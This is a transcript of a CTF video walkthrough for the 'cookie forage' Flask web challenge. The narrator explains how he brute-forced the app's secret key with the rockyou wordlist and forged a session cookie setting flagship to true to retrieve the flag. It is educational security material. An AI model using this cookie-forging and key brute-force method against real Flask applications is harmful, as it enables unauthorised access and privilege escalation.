 How's it going everybody my name is John Hammond I wanted to use this video to showcase one of the challenges from the hack pack CTF that was on just recently I want to showcase the cookie forage challenge, which was a web challenge and when I had solved it originally It was kind of one of the harder ones that had a much higher point value and not as many solves But now here we are Dynamic points and dynamic scoring so this has been down to 100 points that it's been solved by more than a few people So I want to showcase this because I thought it was kind of cool It is helping new local cookie bakery start-up shake down their new online ordering and loyalty reward points at this location It says I wonder if they'll sell you a flask of milk to go with your cookies So going to access this web page It looks like we have cookie forage the place to go for hand forage fire baked pancreas devastating sugar cookies every single time so you could go ahead and order now and you need to go ahead and log in with something so I'll say please subscribe and Whatever password it says you've been logged in as this account, so we go order a cookie. It says cookie forage warnings on the oven There's no pinching. Okay Safety that page seems to be filling with some Boiler plate text and nothing particularly interesting. I don't know how well you can see that California one But it's it's it's a little cheesy and funny Okay, the flagship loyalty one says you aren't a flagship loyalty member No cookies for you So if I go to take a look at my cookies I'm using the cookie editor plug-in on Google Chrome I can see I do have a cookie here that's set for a session and when I first looked at this I was like wow that looks like a JWT or a JSON web token You could go to JWT.io to kind of take a look at this just spit it in here And it'll try and debug it for you or decompress it, but it errors out. It says that's an invalid signature I don't know why I can't speak right now But the invalid signature tells me that okay that doesn't seem to be a JWT token With that I was kind of thinking okay Well, maybe this is a flask session cookie that's set in the flask micro framework that python typically uses I've seen this sort of thing before and I know that that is a technique That is an avenue and a route for attack where you can forge a flask session cookie So I tried to do some research I looked around on this on the googles on the interwebs on the stuff There are a lot of really really cool articles and things you can read about this And I see some options here that even is discussed in Pico CTF and one of their old 2018 challenges they do showcase this technique in the flask cards challenge and here's a Flask decode So this page is really really cool where they break it down into how you can go ahead and abuse this and they even showcase some How the the cookies really put together the session data the time stamp and a cryptographic hash This is all kind of built in with specific things and we were actually when we were in JWT.io It was able to go ahead and determine just by base 64 decoding that first part It says flagship equals false and our username is whatever we supplied So it doesn't matter what username we log in with there's no admin. There's no mod or whatever flagship is really the value that we particularly care about and it seems like we have to go ahead and set that to True when it says you aren't a flagship loyalty member. No cookies for you We need to set that to true. So we are a flagship loyalty member So what I had gone ahead and done was I started to kind of look through all this code and how we could abuse it When I was looking through some of the write-ups that we're referring to Doing this attack or forging a session or session cookie It turns out you always need or you typically need I haven't found a route where you don't you need the secret key of the application or of the server so That's a little tough I hadn't found any techniques where I would be able to leak that out typically if we were to try and clear this session If there were some avenue or aspect in the web page that would allow us to Do some template injection or some like session template injection We might be able to okay get like the config value out If we were reading that with ginger if they were actually being parsed And we were able to return out all the values that config would return for us Or do some math with like seven plus seven Verify that that template injection actually works. We could potentially leak out the secret key I never saw that happen. I couldn't find an injection point to actually Leak out the secret key. So I was like, well, what the heck do we do? If we need the secret key What do we do? Do we just guess it? Do we just brute force it when I asked about this? And I think even the rules they say, hey, don't brute force any of the challenges And I asked the discord server. Is it necessary to brute force any of this stuff? I think the answer was no. I never seemed to get something other than that, but anyway This is kind of the technique in the route that I went went down on I'll start to just fire this up in a in a script so we can really see what I'm talking about I have a script.py down here. We can go ahead and create and I'll Clear out some of my stuff from the other videos I've been trying to put out So let's go ahead and create a python script. I will import requests And I'll have our url, which should be just this guy for the web page You are all here. I'll try and go ahead and log in with the with a session that we can create So let me kill that cookie again and get back to our login page So when we go ahead and submit something to this login, I'll open up my network tab so I can see Okay, what are the real values that are passed through? I'll say username and password That gets me to log in Seeing this if I go view what is actually passed in here within the headers or within the parameters or etc etc We are sending in username and password set there And maybe that would allow us to actually go ahead and Grab a session cookie. So let me do that in Our python script. I'll go ahead and create a session. I'll say that's a request dot session And I'll try and log in when I say s dot post to our url And they were going to the login endpoint Is that log in dot php? Nope, just regular login. So our data can go ahead and equal Username can be anything Password can also be anything And let's just store that as a variable so I can actually see what it returns for us Let's go ahead and print out that r value. It looks like it returned successfully. So let's go grab the text And it says, okay, you've been logged in as the user that we've supplied So now I should be able to go ahead and actually access What are my session cookies if I go take a look at that session dot? I have a cookie jar here I want to go ahead and access the session value and that is what I have as my actual Session. So let's just say that can be a variable for us. Let's just call that a session cookie, I suppose Now we're going to have a proof of concept getting a regular default crafted session cookie But we need to go ahead and forge it again. We need to know the secret key of this application that's written in flask I wasn't able to track anything down with that What I had done to brute force for the longest time is I ended up doing things like creating a simple manual word list out of some of the words that are on the page between Okay, oven pinching cookie forge and I had no idea how it would actually look like sugar california Is there going to be capital letters or they're going to be Random leet speak is they're going to be nonsense I I just couldn't figure it out. I use cool for the time being to go ahead and actually grab Some potential words that would be used in each of the pages It would spit out a good few of them But even using that to brute force just wouldn't work and Cool if you don't know is a good utility to make a custom word list from a web page But it didn't work. So anyway, let me show you this procedure What I had ended up doing was using some of the code Where we could encode or decode a specific flask session cookie. I ended up finding that on github No, roge had a really really good one. I think he's from raw sec. I think yeah, yeah, yeah They have some excellent stuff from that ctf team. So using this in python 2 or python 3 Sublime is currently set up to use python 2. So I think I'll stick with that Hopefully no one gets angry at me But they give you this tool where you can go ahead from the command line and encode or decode session cookies based on a specific payload Given a string or a type or a cookie structure, etc, etc But you always need the secret key So here's what I ended up doing. I'll go ahead and steal some of the code from this guy here Grabbing the it's dangerous module and their base 60 40 code because that's what flask actually uses to go ahead and create And work through these sessions and create these session cookies So let me just kind of steal this standard input stuff that he uses I'll slap that in my little ape script And we don't need to worry about arg parts, but we do probably want to be able to determine session cookie stuff So he ended up creating a little mock app class And ended up creating for a flask session cookie manager here And he would use some methods encode or decode that would use some of the values that were pulled out of these these Libraries here. Let me go ahead and just rip these encode and decode functions So we have them and can see if they are in fact what we're going to end up working with Let me turn the text size down here so I can make sense of what's going on This decode function, we'll just kind of verify This would use one other argument for a class, but because we're not going to use that in a class We won't bother with it. It looks like it does need that mock app object. So I'll just go ahead and steal that guy Slap him in And it'll create something from ast which we should be able to load Let me just see if this still works. Yep. Okay. So no session issues for me You might need to go ahead and install flask to get this to work pip install pip 2 pip 3 whatever you end up using But with that we should be able to go ahead and encode a specific string Let me just do a simple proof of concept to verify that that would work. So let's print What we're using our encode function for and we can say dummy secret key And our session cookie structure. So that's probably going to be expected as a string And that's why you can determine. Oh, they're using a literal eval So they're actually taking a string of a dictionary object. So I'll just say Anything Can be set to anything Run this and it looks like it will actually go ahead and cook that cookie for us So we know that encode function works. Now, let's go ahead and decode a cookie Really, we don't need to do that because we've already kind of got our decode functionality Or we all we care about is forging this cookie, right? So we need to go ahead and build our own payload as to what we want Our session cookie to look like on the real website and we need to figure out the secret key What I'm going to do is I'm going to end up brute forcing that secret key Again, I use core cool earlier to try and figure it out. Um, that never worked for me So I ended up trying it with rock you and that actually had some success So let me show you what I do. Let's go ahead and grab sort of a payload that we want to use or our own session Uh, JWT should still have this guy here for us, which is the structure that we want And let's make this All online so it will behave. I'll set that to true and our username can still be please sub. That's totally fine Let's go ahead and determine what the secret key might be Let's just try a dummy one and see if we can get the website to do anything strange. So I'll encode again a new cookie make that dummy secret key Which will fail and our payload And then if we go ahead and access the flagship loyalty page If I take a look at the network tab if I go Well, I access that it looks like it tries to access flag So that might be a resource or location that we can just kind of hammer and test With our secret key is to determine if it's going to give the flag to us So the flag format for the ctf is just flag curly brace So what we could do is we could take our url And now that we've made a new cookie we can go ahead and try and access that page. So I'll use requests dot get url plus Flag and I'll include our cookie Now as a new cookie with my session new cookie in there Let's say that as a variable so we can go ahead and see What it returns for us r dot text and That seems to display Nothing in our case So Maybe we know we have the secret key that's wrong But we can go ahead and try to brute force now with some potential ones So what I'm going to end up doing is I'm actually just going to Open up rock you so with open opt Rock you dot text trying to see my keyboard with the microphone in the way Uh, I still bad that I look at my keyboard, but whatever. Let's do handle dot read lines And then I know there's going to be Some new line characters in that so I'll do l dot strip for l and handle read lines So now I have an array or a whole list of lines So for secret key In lines we can go ahead and specify our new cookie And request the page with that And we'll go ahead and verify We can test if That flag format prefix is in r dot text because if it is we could say oh, hey We got the flag and we'll go ahead and print out that r dot text So we could see it we could find I'll break there and what I'll do is I'll go ahead and actually print out Trying secret key And we'll format in our Secret key And we should be sure to use that in the encode function. So it actually works there for us. So let's fire this up I'm going to run this script now It'll take a little bit to start because it has to read in the entire rock you file But then it's going to go ahead and try and hammer the service with these So we can go ahead and try keep trying secret keys and eventually we find one with password one So if I go check it out up here, it's trying the secret key password one and it got the flag It was able to see that flag prefix in the output and it says, oh my egging pancreas These are delicious. Great. So That's it. That was the flag you could submit for however many points that it was Worth while at that time because you know very annoying. It has dynamic scoring I honestly hate dynamic scoring, but hey, you didn't ask me. So, uh, that's that that's the technique All I really did was go ahead go go ahead and grab all of those flask dependencies necessity is the boilerplate stuff that it needs And then create a simple app that will allow you to work with a secret key And then I just kind of stole the code from noraj because hey, I know that will go ahead and create A simple cookie for me without even have the whole infrastructure of flask behind it I could forge it and create it with the payload that I needed And determining the secret key allows me to inject it into that same application and get the flag out of that So I use rocketer brute force cool didn't work for me try my own manual word list didn't work for me That was a the technique that I had used. So holy cow. Thank you guys so much for watching Uh, I hope you guys enjoyed if you did I'd love to see you guys hit that like button type a little comment Say something nice or mean. I don't care. It whatever brings in the engagement YouTube algorithm stuff. So please subscribe. It'd be fantastic to see you guys I'd love to see on the discord server. There's a link in the description super smart people in there much smarter than me And uh, see you on patreon paypal discord linkedin facebook twitter instagram all of the social media things Thanks everybody. I'll see you later